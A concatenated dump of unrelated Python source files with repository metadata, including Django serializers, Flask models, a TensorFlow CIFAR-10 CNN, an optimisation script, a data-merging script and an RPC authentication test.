def _get_history_calls(self, log_str, call_type, min_idx, max_idx):
self.log(log_str)
_sel_mem=self.protocolclass.select_storage_req()
_sel_mem.storage=call_type
self.sendATcommand(_sel_mem, None)
_list_pb=self.protocolclass.read_phonebook_req()
_list_pb.start_index=min_idx
_list_pb.end_index=max_idx
self.sendATcommand(_list_pb, None)
def getcallhistory(self, result):
self.log('Getting Call History')
self.setmode(self.MODEMODEM)
self.charset_ascii()
res={}
for l in self.protocolclass.PB_CALL_HISTORY_INFO:
self._get_history_calls(*l)
result['call_history']=res
return result
parent_profile=com_gsm.Profile
class Profile(parent_profile):
serialsname=Phone.serialsname
WALLPAPER_WIDTH=128
WALLPAPER_HEIGHT=128
MAX_WALLPAPER_BASENAME_LENGTH=19
WALLPAPER_FILENAME_CHARS="abcdefghijklmnopqrstuvwxyz0123456789_ ."
WALLPAPER_CONVERT_FORMAT="jpg"
MAX_RINGTONE_BASENAME_LENGTH=19
RINGTONE_FILENAME_CHARS="abcdefghijklmnopqrstuvwxyz0123456789_ ."
RINGTONE_LIMITS= {
'MAXSIZE': 20480
}
phone_manufacturer='LGE'
phone_model='G4015'
usbids=( ( 0x10AB, 0x10C5, 1),
)
deviceclasses=("serial",)
imageorigins={}
imageorigins.update(common.getkv(parent_profile.stockimageorigins, "images"))
imagetargets={}
imagetargets.update(common.getkv(parent_profile.stockimagetargets, "wallpaper",
{'width': 128, 'height': 128, 'format': "JPEG"}))
def GetImageOrigins(self):
return self.imageorigins
def GetTargetsForImageOrigin(self, origin):
if origin=='images':
return self.imagetargets
def __init__(self):
parent_profile.__init__(self)
_supportedsyncs=(
('phonebook', 'read', None), # all phonebook reading
('phonebook', 'write', 'OVERWRITE'), # only overwriting phonebook
('calendar', 'read', None), # all calendar reading
('calendar', 'write', 'OVERWRITE'), # only overwriting calendar
('ringtone', 'read', None), # all ringtone reading
('ringtone', 'write', 'OVERWRITE'),
('wallpaper', 'read', None), # all wallpaper reading
('wallpaper', 'write', 'OVERWRITE'),
('memo', 'read', None), # all memo list reading DJP
('memo', 'write', 'OVERWRITE'), # all memo list writing DJP
('sms', 'read', None), # all SMS list reading DJP
('call_history', 'read', None),
)
def convertphonebooktophone(self, helper, data):
return data
|
[
"joliebig@fim.uni-passau.de"
] |
joliebig@fim.uni-passau.de
|
807f765e562c91b7b553d54b94e18b572bf55c33
|
6f94db52103adeee9727d795ca1ba0b9d98f096f
|
/geodjango/api/serializer.py
|
dcf71d5dcd9c61c90253300244984896dd8c66f0
|
[] |
no_license
|
dannybombastic/vozplus
|
a15fa5a13f39b749479bdc39ad87062b50f775a7
|
b338809797f874388bbff270dea1c342e9d0fa56
|
refs/heads/master
| 2022-12-10T12:53:27.441115
| 2018-08-01T08:52:39
| 2018-08-01T08:52:39
| 143,129,291
| 0
| 0
| null | 2022-12-08T02:25:12
| 2018-08-01T08:48:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,312
|
py
|
from django.contrib.auth.models import User, Group
from rest_framework import serializers, exceptions
from django.contrib.gis.db import models
from django.contrib.auth import authenticate, login
from .models import Laptop, MenbersPoint
from rest_framework_gis.serializers import GeoFeatureModelSerializer
# Create your models here.
class UserSerializer(serializers.HyperlinkedModelSerializer):
password = serializers.CharField(write_only=True)
class Meta:
model = User
fields = ('url', 'username', 'email', 'groups','password')
def create(self, validated_data):
user = super(UserSerializer, self).create(validated_data)
user.set_password(validated_data['password'])
user.save()
return user
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ('url', 'name')
class CordenateMenbersSerializer(GeoFeatureModelSerializer):
class Meta:
model = MenbersPoint
geo_field = 'point'
fields = '__all__'
class LoginSerializer(serializers.Serializer):
class Meta:
model = User
fields = '__all__'
username = serializers.CharField()
password = serializers.CharField()
def validate(self,data):
username = data.get("username","")
password = data.get("password","")
if username and password:
user = authenticate(username = username, password = password)
if user:
if user.is_active:
data["user"] = user
else:
msg = 'User is deactivate'
raise exceptions.ValidationError(msg)
else:
msg = 'Unable to login with credentials'
raise exceptions.ValidationError(msg)
else:
msg = 'Must provide username and password'
raise exceptions.ValidationError(msg)
return data
class CordenateLaptopSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Laptop
fields = '__all__'
|
[
"root@tough-cough.com"
] |
root@tough-cough.com
|
ba1172395def777d712bd499abc3f9b9c2a962b1
|
6d8b11a7a056963fc976d61c1a1050888bb43218
|
/main.py
|
1421bed6d2feae3ca3def9f47642253ad02d9057
|
[] |
no_license
|
RubenJacobse/test
|
ad60e324c6b161a3f26614245291d31081a2478d
|
de6ca9154ed84f0ebf56395d51431cb28cfdd93c
|
refs/heads/master
| 2021-10-08T11:44:15.034664
| 2018-12-11T22:54:48
| 2018-12-11T22:54:48
| 107,828,990
| 0
| 0
| null | 2017-10-22T01:44:05
| 2017-10-22T01:36:55
| null |
UTF-8
|
Python
| false
| false
| 90
|
py
|
def print_hello():
print("Hello World!")
if __name__ == "__main__":
print_hello()
|
[
"ruben_jacobse@hotmail.com"
] |
ruben_jacobse@hotmail.com
|
7277918ec75809a8a71b8275b98e117a96846ba6
|
2b167e29ba07e9f577c20c54cb943861d0ccfa69
|
/numerical_analysis_backup/small-scale-multiobj/pareto2/backup_arch4_pod100_new/pareto19.py
|
de8f21e817aca14a05b627e5caf903f8d4b0192a
|
[] |
no_license
|
LiYan1988/kthOld_OFC
|
17aeeed21e195d1a9a3262ec2e67d6b1d3f9ff0f
|
b1237577ea68ad735a65981bf29584ebd889132b
|
refs/heads/master
| 2021-01-11T17:27:25.574431
| 2017-01-23T05:32:35
| 2017-01-23T05:32:35
| 79,773,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,949
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
import csv
from gurobipy import *
import numpy as np
from arch4_decomposition_new import Arch4_decompose
np.random.seed(2010)
num_cores=3
num_slots=80
i = 19
time_limit_routing = 2400 # 1000
time_limit_sa = 108 # 10800
filename = 'traffic_matrix_'+str(i)+'.csv'
# print filename
tm = []
with open(filename) as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
if idx>11:
row.pop()
row = [float(u) for u in row]
tm.append(row)
tm = np.array(tm)*25
#%% arch2
betav = np.arange(0.0001,0.005,0.0001)
connection_ub = []
throughput_ub = []
connection_lb = []
throughput_lb = []
obj_ub = []
obj_lb = []
for beta in betav:
m = Arch4_decompose(tm, num_slots=num_slots, num_cores=num_cores,alpha=1,beta=beta)
m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.01, method=2)
m.sa_heuristic(ascending1=False,ascending2=False)
connection_ub.append(m.connections_ub)
throughput_ub.append(m.throughput_ub)
obj_ub.append(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
connection_lb.append(m.obj_sah_connection_)
throughput_lb.append(m.obj_sah_throughput_)
obj_lb.append(m.alpha*m.obj_sah_connection_+m.beta*m.obj_sah_throughput_)
# print m.obj_sah_/float(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
result = np.array([betav,connection_ub,throughput_ub,obj_ub,
connection_lb,throughput_lb,obj_lb]).T
file_name = "result_pareto_arch4_pod100_nf_{}.csv".format(i)
with open(file_name, 'w') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow(['beta', 'connection_ub', 'throughput_ub',
'obj_ub', 'connection_lb', 'throughput_lb', 'obj_lb'])
writer.writerows(result)
|
[
"li.yan.ly414@gmail.com"
] |
li.yan.ly414@gmail.com
|
cebc2086404383471286d8b1b71e54e5c281e023
|
c874e55ec73043f6b837601cc58d855d37649e59
|
/avbernat/All_Morphology/update_on_04.20.2020/all_morph-Autumn2019.py
|
be4b5cca643de276216485f02507d4426d0bf064
|
[] |
no_license
|
mlcenzer/SBB-dispersal
|
85c54c924b399834a798d700cabf0b2702ae0755
|
1a777370986f83186180552a09149dfba72b96d0
|
refs/heads/master
| 2022-12-11T10:13:32.416530
| 2022-12-03T16:23:52
| 2022-12-03T16:23:52
| 229,098,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,446
|
py
|
import os
import csv
from datetime import datetime, date
all_morph = r"/Users/anastasiabernat/Desktop/allmorph/morph_to_cp.csv" # near completed file but missing dates
demographics_data = r"/Users/anastasiabernat/Desktop/allmorph/bug_demographics_data_coor.csv" # file with sites so can match site-dates to site-IDs
field_date_collected_dict = {"NW 10th Ave & 18th St": "10.06.2019", # GV
"SW 296th St & 182nd Ave": "10.04.2019", # HS
"JP Grove": "10.04.2019", # KL
"Barber shop": "10.05.2019", # LP
"Polk": "10.05.2019", # LW
"Veteranโs Memorial Park": "10.05.2019", # LB
"MM165": "10.02.2019",
"Charlemagne": "10.02.2019",
"Dynamite Docks": "10.02.2019",
"DD front": "10.02.2019",
"Dagny 1/2 Loop": "10.03.2019",
"Carysfort Cr": "10.03.2019",
"N. Dagny": "10.03.2019",
"Founder's #1": "10.02.2019", # PK
"Founder's #2": "10.02.2019", # PK
"Dagny Trellis": "10.03.2019",
"DD -inter": "10.02.2019", # unkown
"DD": "10.02.2019"}
def diff_month(d1, d2):
return (d1.year - d2.year) * 12 + (d1.month - d2.month)
date_dict = {} # Creates a dictionary with ID's as the keys and dates as the values
with open(demographics_data, "r") as demo_data:
reader = csv.DictReader(demo_data)
for row in reader:
ID = row["ID"]
site = row["site"]
if ID not in date_dict:
try:
date_dict[ID] = field_date_collected_dict[(site)]
except KeyError:
print("KeyError for ID, ", ID)
print("KeyError for site, ", site)
#print(date_dict)
full_data = []
with open(all_morph, "r") as morph_data:
reader = csv.DictReader(morph_data)
for r in reader:
ID_num = r["\ufeffID"]
try:
date = date_dict[(ID_num)]
except KeyError:
print("KeyError for ID, ", ID_num)
continue
date_object = datetime.strptime(date, '%m.%d.%Y').date()
start_str = "05.01.2013" # This will need to be changed once we know the exact date. 'True' starting month of allmorph datasheet
start_date = datetime.strptime(start_str, '%m.%d.%Y').date()
days_since_day_zero = diff_month(date_object, start_date)
r['months_since_month_zero'] = r.pop('date')
r["months_since_month_zero"] = days_since_day_zero
r["field_date_collected"] = date
full_data.append(r)
#print(full_data[0:5])
outpath = r"/Users/anastasiabernat/Desktop/allmorph/allmorphology_newfieldbugs-edited.csv"
ordered_header = ["\ufeffID", "pophost", "population", "sex", "beak", "thorax", "wing", "body", "month", "year",
"months_since_month_zero", "season", "w_morph", "lat", "long", "diapause",
"field_date_collected", "notes", "date_measured", "date_entered", "recorder"]
with open(outpath, "w") as output_file:
writer = csv.DictWriter(output_file, fieldnames = ordered_header)
writer.writeheader()
for r in full_data:
writer.writerow(r)
|
[
"anastasiabernat@Anastasias-MacBook-Pro.local"
] |
anastasiabernat@Anastasias-MacBook-Pro.local
|
bd8b7e39ecd5539a3b0f06ea57335f802db1f60e
|
301bdb50009961c35494df9fb43625c262047a17
|
/qa/rpc-tests/multi_rpc.py
|
69902992e5f52404415d487fb4e79df3b5d157a5
|
[
"MIT"
] |
permissive
|
franklee1/master4
|
e6a10bcf068259aab70f886cd1dac50261deda73
|
a82cf06267de12b685390c26075e3debfd937788
|
refs/heads/master
| 2021-05-11T13:21:19.785228
| 2018-01-16T11:57:01
| 2018-01-16T11:57:01
| 117,677,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,593
|
py
|
#!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test mulitple rpc user config option rpcauth
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import base64
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
class HTTPBasicsTest (BitcoinTestFramework):
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir)
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain(self.options.tmpdir)
#Append rpcauth to master.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
with open(os.path.join(self.options.tmpdir+"/node0", "master.conf"), 'a') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urlparse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcuser tool
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Use new authpair to confirm both work
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong login name with rt's password
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Wrong password for rt
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Correct for rt2
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong password for rt2
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
[
"franklee85@live.com"
] |
franklee85@live.com
|
f7d6509abcaf4a031583b345b0880baf361bc352
|
c60703a79835fc05aec549d64bf9eedebbcbd20a
|
/app/models.py
|
6ec03c8dfd6f053b6f962a5e0fddaa23b9ac3deb
|
[
"MIT"
] |
permissive
|
Abdisamad100/pitches
|
2dcd25a2d9fcc1e1a5a0b110e1577f1c2c8cae0b
|
17f816fa2aa9e697c663afe7839e4108275da8c6
|
refs/heads/master
| 2023-02-02T14:25:58.945931
| 2020-12-16T11:44:27
| 2020-12-16T11:44:27
| 318,565,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,444
|
py
|
from . import db
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
#...
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key = True)
username = db.Column(db.String(255),index = True)
email = db.Column(db.String(255),unique = True,index = True)
bio = db.Column(db.String(255))
profile_pic_path = db.Column(db.String())
pass_secure = db.Column(db.String(255))
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
self.pass_secure = generate_password_hash(password)
def verify_password(self,password):
return check_password_hash(self.pass_secure,password)
def __repr__(self):
return f'User {self.username}'
class Pitches(db.Model):
__tablename__= 'pitches'
id = db.Column(db.Integer,primary_key = True)
title = db.Column(db.String(255))
category = db.Column(db.String(255))
pitch = db.Column(db.String(255))
date = db.Column(db.DateTime(250), default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
comments = db.relationship('Comments', backref='title', lazy='dynamic')
def save_pitch(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_pitches(cls,cate):
pitch = Pitches.query.filter_by(category=cate).all()
return pitch
def __repr__(self):
return f"Pitches {self.pitch}','{self.date}')"
class Comments(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
comment = db.Column(db.String(255))
date_posted = db.Column(db.DateTime(250), default=datetime.utcnow)
pitches_id = db.Column(db.Integer, db.ForeignKey("pitches.id"))
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
def save_comment(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_comment(cls,id):
comments = Comments.query.filter_by(pitches_id=id).all()
return comments
def __repr__(self):
return f"Comments('{self.comment}', '{self.date_posted}')"
|
[
"abdisamadcade004@gmail.com"
] |
abdisamadcade004@gmail.com
|
3c24799c5db4e119676f9a6ba6df045d88501c4b
|
78b430738a078e2bbd75140aa05c5dd19d0086cf
|
/tf114/tf19_cnn4_cifa10.py
|
171b7b7013abf4bb0e1bda55dab2bbe176a4cd45
|
[] |
no_license
|
silvermund/keras-study
|
b1a453b9427364f7f7f6ed095ea3a7d2dc0a8ea1
|
948a02d10d53d9e4450f9164cf2835f0b24574e2
|
refs/heads/main
| 2023-07-16T05:01:45.702395
| 2021-09-01T02:12:36
| 2021-09-01T02:12:36
| 383,711,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
# ์ค์ต
# ๋ง๋ค๊ธฐ
# 0.7 ์ด์
import tensorflow as tf
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPool2D
tf.compat.v1.disable_eager_execution()
print(tf.executing_eagerly()) # False
print(tf.__version__) # 1.14.0 -> 2.4.1
# tf.set_random_seed(66)
# 1. ๋ฐ์ดํฐ
from keras.datasets import cifar10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
from keras.utils import to_categorical
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
x_train = x_train.reshape(50000, 32, 32, 3).astype('float32')/255
x_test = x_test.reshape(10000, 32, 32, 3).astype('float32')/255
learning_rate = 0.0002
training_epochs = 20
batch_size = 100
total_batch = int(len(x_train)/batch_size)
x = tf.compat.v1.placeholder(tf.float32, [None, 32, 32, 3])
y = tf.compat.v1.placeholder(tf.float32, [None, 10])
# 2. ๋ชจ๋ธ๊ตฌ์ฑ
# layer1
W1 = tf.compat.v1.get_variable('W1', shape=[3, 3, 3, 32])
# [kernel_size, input_shape_channel, output_filter]
print(W1) # (3, 3, 1, 32)
L1 = tf.nn.conv2d(x, W1, strides=[1,1,1,1], padding='SAME')
L1 = tf.nn.relu(L1)
L1_maxpool = tf.nn.max_pool(L1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
# model = Sequential()
# model.add(Conv2D(filters=32, kernel_size=(3,3), strides=1, color
# padding='valid', input_shape=(28, 28, 1)), # (low, cols, channel)
# activation='relu')
# model.add(MaxPool2D())
print(L1) # (?, 28, 28, 32)
print(L1_maxpool) # (?, 14, 14, 32)
# layer2
W2 = tf.compat.v1.get_variable('W2', shape=[3, 3, 32, 64])
L2 = tf.nn.conv2d(L1_maxpool, W2, strides=[1,1,1,1], padding='SAME')
L2 = tf.nn.selu(L2)
L2_maxpool = tf.nn.max_pool(L2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
print(L2) # (?, 14, 14, 64)
print(L2_maxpool) # (?, 7, 7, 64)
# layer3
W3 = tf.compat.v1.get_variable('W3', shape=[3, 3, 64, 128])
L3 = tf.nn.conv2d(L2_maxpool, W3, strides=[1,1,1,1], padding='SAME')
L3 = tf.nn.selu(L3)
L3_maxpool = tf.nn.max_pool(L3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
print(L3) # (?, 7, 7, 128)
print(L3_maxpool) # (?, 4, 4, 128)
# layer4
W4 = tf.compat.v1.get_variable('W4', shape=[2, 2, 128, 64],)
# initializer=tf.contrib.layers.xavier_initializer())
L4 = tf.nn.conv2d(L3_maxpool, W4, strides=[1,1,1,1], padding='VALID')
L4 = tf.nn.leaky_relu(L4)
L4_maxpool = tf.nn.max_pool(L4, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
print(L4) # (?, 4, 4, 64)
print(L4_maxpool) # (?, 2, 2, 64)
# Flatten
L_flat = tf.reshape(L4_maxpool, [-1, 2*2*64])
print("Flatten", L_flat) # (?, 256)
# layer5 DNN
W5 = tf.compat.v1.get_variable('W5', shape=[2*2*64, 64],)
# initializer=tf.contrib.layers.xavier_initializer())
B5 = tf.Variable(tf.random.normal([64]), name='B1')
L5 = tf.matmul(L_flat, W5) + B5
L5 = tf.nn.selu(L5)
# L5 = tf.nn.dropout(L5, keep_prob=0.2)
print(L4) # (?, 4, 4, 64)
print(L4_maxpool) # (?, 2, 2, 64)
# layer6 DNN
W6 = tf.compat.v1.get_variable("W6", shape=[64, 32])
B6 = tf.Variable(tf.random.normal([32]), name='B2')
L6 = tf.matmul(L5, W6) + B6
L6 = tf.nn.selu(L6)
# L6 = tf.nn.dropout(L6, keep_prob=0.2)
print(L6) # (?, 32)
# layer7 Softmax
W7 = tf.compat.v1.get_variable("W7", shape=[32, 10])
B7 = tf.Variable(tf.random.normal([10]), name='B3')
L7 = tf.matmul(L6, W7) + B7
hypothesis = tf.nn.softmax(L7)
print(hypothesis) # (?, 10)
# 3. ์ปดํ์ผ ํ๋ จ
# categorical_crossentropy
loss = tf.reduce_mean(-tf.reduce_sum(y*tf.math.log(hypothesis), axis=1))
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
sess = tf.compat.v1.Session()
sess.run(tf.compat.v1.global_variables_initializer())
# learning_rate = 0.001
# training_epochs = 15
# batch_size = 100
# total_batch = int(len(x_train)/batch_size)
for epoch in range(training_epochs):
avg_loss = 0
for i in range(total_batch): # ๋ช ๋ฒ ๋๋๊ฐ? 600 ๋ฒ
start = i * batch_size
end = start + batch_size
batch_x, batch_y = x_train[start:end], y_train[start:end]
feed_dict = {x:batch_x, y:batch_y}
batch_loss, _ = sess.run([loss, optimizer], feed_dict=feed_dict)
avg_loss += batch_loss/total_batch
print('Epoch : ', '%04d' %(epoch + 1), 'loss : {:.9f}'.format(avg_loss))
print("ํ๋ จ ๋")
prediction = tf.equal(tf.compat.v1.arg_max(hypothesis, 1), tf.compat.v1.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))
print('ACC : ', sess.run(accuracy, feed_dict={x:x_test, y:y_test}))
# 0.7 ์ด์
# ACC : 0.7079
|
[
"cliferd@naver.com"
] |
cliferd@naver.com
|
95d1c581109e4eb8c4580ae22f4f9f6059a36834
|
c45e36421992436f1234ddf5088c1c12a576209e
|
/autoshop_project/car_models/urls.py
|
64ac0132345907cfebda6f5062e8a8bbecbdf270
|
[] |
no_license
|
dimavitvickiy/autoshop
|
e897fd67e61030e87c60e548f43178741f09dbf1
|
2c6228ae6c004b6f5ee28dfbf9afabee311fc360
|
refs/heads/master
| 2021-01-11T08:02:13.040752
| 2017-10-24T11:16:35
| 2017-10-24T11:16:35
| 72,923,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
from django.conf.urls import url
from . import views as model_views
urlpatterns = [
url(r'^create$', model_views.car_model_create, name='create'),
url(r'^$', model_views.car_model_list, name='list'),
url(r'^(?P<slug>[\w-]+)/$', model_views.car_model_detail, name='detail'),
url(r'^(?P<slug>[\w-]+)/delete$', model_views.car_model_delete, name='delete'),
url(r'^(?P<slug>[\w-]+)/update', model_views.car_model_update, name='update'),
]
|
[
"dimavitvickiy@gmail.com"
] |
dimavitvickiy@gmail.com
|
98cd5ad237fa3b9eeb6fd7632584c85ec67ea736
|
0e3a9758175f37e4d702ff6ccd6d2ee2e91f727f
|
/deepiu/textsum/inputs/default/input.py
|
7bd4d6525e0a6f7bdbde178777e15637e93ef6f3
|
[] |
no_license
|
hitfad/hasky
|
94d7248f21a1ec557a838b77987e34b77fb9a0c7
|
c1d2d640643037c62d64890c40de36ba516eb167
|
refs/heads/master
| 2021-01-20T22:55:36.778378
| 2017-08-29T13:23:50
| 2017-08-29T13:23:50
| 101,830,092
| 1
| 0
| null | 2017-08-30T02:48:35
| 2017-08-30T02:48:35
| null |
UTF-8
|
Python
| false
| false
| 2,351
|
py
|
#!/usr/bin/env python
# ==============================================================================
# \file input.py
# \author chenghuige
# \date 2016-08-17 23:50:47.335840
# \Description
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import melt
import conf
from conf import TEXT_MAX_WORDS, INPUT_TEXT_MAX_WORDS
def _decode(example, parse, dynamic_batch_length):
features = parse(
example,
features={
'ltext_str': tf.FixedLenFeature([], tf.string),
'ltext': tf.VarLenFeature(tf.int64),
'rtext_str': tf.FixedLenFeature([], tf.string),
'rtext': tf.VarLenFeature(tf.int64),
})
text = features['rtext']
input_text = features['ltext']
maxlen = 0 if dynamic_batch_length else TEXT_MAX_WORDS
text = melt.sparse_tensor_to_dense(text, maxlen)
#for attention to be numeric stabel and since encoding not affect speed, dynamic rnn encode just pack zeros at last
#but encoding attention with long batch length will affect speed.. see if 100 1.5 batch/s while dynamic will be 3.55
#TODO make attention masked
input_maxlen = 0 if dynamic_batch_length else INPUT_TEXT_MAX_WORDS
#input_maxlen = INPUT_TEXT_MAX_WORDS
input_text = melt.sparse_tensor_to_dense(input_text, input_maxlen)
text_str = features['rtext_str']
input_text_str = features['ltext_str']
try:
image_name = features['image_name']
except Exception:
image_name = text_str
return image_name, text, text_str, input_text, input_text_str
def decode_examples(serialized_examples, dynamic_batch_length):
return _decode(serialized_examples, tf.parse_example, dynamic_batch_length)
def decode_example(serialized_example, dynamic_batch_length):
return _decode(serialized_example, tf.parse_single_example, dynamic_batch_length)
#-----------utils
def get_decodes(shuffle_then_decode, dynamic_batch_length):
if shuffle_then_decode:
inputs = melt.shuffle_then_decode.inputs
decode = lambda x: decode_examples(x, dynamic_batch_length)
else:
inputs = melt.decode_then_shuffle.inputs
decode = lambda x: decode_example(x, dynamic_batch_length)
return inputs, decode
|
[
"29109317@qq.com"
] |
29109317@qq.com
|
b4d087ebdad7c52b1f7aff6793cbe40278d29514
|
627a6a84b92605f997f3c8d64a2c3c0eb6a74e52
|
/venv/bin/easy_install-3.6
|
ea37d7573e615c666ad275aa4efade0c853a1511
|
[] |
no_license
|
iamjasonkuo/househunt
|
c67c75d8cc6e3a9cdae8bc1ef55396766c34d91f
|
7e9a4b380381f46dfebf51ead955051b39a9a691
|
refs/heads/master
| 2022-10-16T04:02:41.007357
| 2018-04-19T17:22:25
| 2018-04-19T17:22:25
| 100,439,717
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
6
|
#!/Users/jasonkuo/Desktop/random_coding_stuff/househunt/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jasonkuo@Jasons-MacBook-Pro.local"
] |
jasonkuo@Jasons-MacBook-Pro.local
|
887e7916d09010528ac3bd14caf87cdbb2bd0b28
|
5704bf1f4e8d3bc0ded23406d5cd0dc93412ea27
|
/python/python_questions/merge_lists.py
|
fbbdddb779722b62e321b868d652a2881ed71cf1
|
[] |
no_license
|
apollopower/interview-prep
|
c6854b0e15a516fe46993f72ca8922f74881ec49
|
4d53b473efc001d41b989131762f0deaee5c7b13
|
refs/heads/master
| 2020-03-27T08:14:24.951750
| 2019-04-03T20:27:21
| 2019-04-03T20:27:21
| 146,235,471
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
# Merge Two Sorted lists
# The key to this problem is that the given lists are
# already sorted. We can just iterate through both
# at the same time, inserting the smallest value at a given
# time, and then checking the next value
# Space complexity => O(n), we are returning a newly merged list
# Time complextiy => O(n), we are iterating through each list only once
def merged_lists(list_1, list_2):
merged_list = []
if len(list_1) > len(list_2):
largest_length = len(list_1)
else:
largest_length = len(list_2)
i = 0 # list_1
j = 0 # list_2
while i < largest_length or j < largest_length:
if i == len(list_1):
# insert remaining valus of list_2
# and return merged_list
while j < largest_length:
merged_list.append(list_2[j])
j += 1
return merged_list
elif j == len(list_2):
# insert remaining values of list_1
# and return merged_list
while i < largest_length:
merged_list.append(list_1[i])
i += 1
return merged_list
elif list_1[i] < list_2[j]:
merged_list.append(list_1[i])
i += 1
else:
merged_list.append(list_2[j])
j += 1
return merged_list
list_1 = [1,3,5,7,10,12]
list_2 = [2,4,6,8,9]
print(merged_lists(list_1, list_2))
|
[
"erthaljonas@gmail.com"
] |
erthaljonas@gmail.com
|
7db69faceef3b27295847c559aff8e592796a2c9
|
